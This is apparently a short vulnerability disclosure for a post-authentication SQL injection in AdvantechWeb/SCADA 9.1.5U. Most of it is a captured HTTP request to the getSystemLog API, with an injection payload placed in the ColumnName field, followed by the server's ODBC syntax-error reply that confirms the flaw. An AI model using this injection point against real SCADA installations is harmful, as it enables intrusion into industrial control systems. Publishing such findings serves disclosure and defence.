Headline
AdvantechWeb/SCADA 9.1.5U SQL Injection
AdvantechWeb/SCADA version 9.1.5U suffers from a post authentication remote SQL injection vulnerability.
;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U;; ;; found: 28.12.2023;;;; more: ;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html;; POST /waconfig/api/odbc/getSystemLog HTTP/2Host: 192.168.56.106Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPANUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: application/json, text/plain, */*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/json;charset=utf-8Content-Length: 359Origin: https://192.168.56.106Referer: https://192.168.56.106/waconfig/indexSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: keep-alive{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}resp:HTTP/2 200 OKCache-Control: no-cachePragma: no-cacheContent-Length: 225Content-Type: application/json; charset=utf-8Expires: -1Server: Microsoft-IIS/10.0X-Ua-Compatible: IE=EmulateIE7Access-Control-Allow-Origin: http://localhost:8080Access-Control-Allow-Methods: GET,POST,OPTIONSAccess-Control-Allow-Headers: Content-TypeAccess-Control-Allow-Credentials: trueStrict-Transport-Security: max-age=31536000;includeSubDomains;preloadX-Content-Type-Options: nosniffDate: Thu, 28 Dec 2023 21:29:56 GMT{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."} ;; cheers;;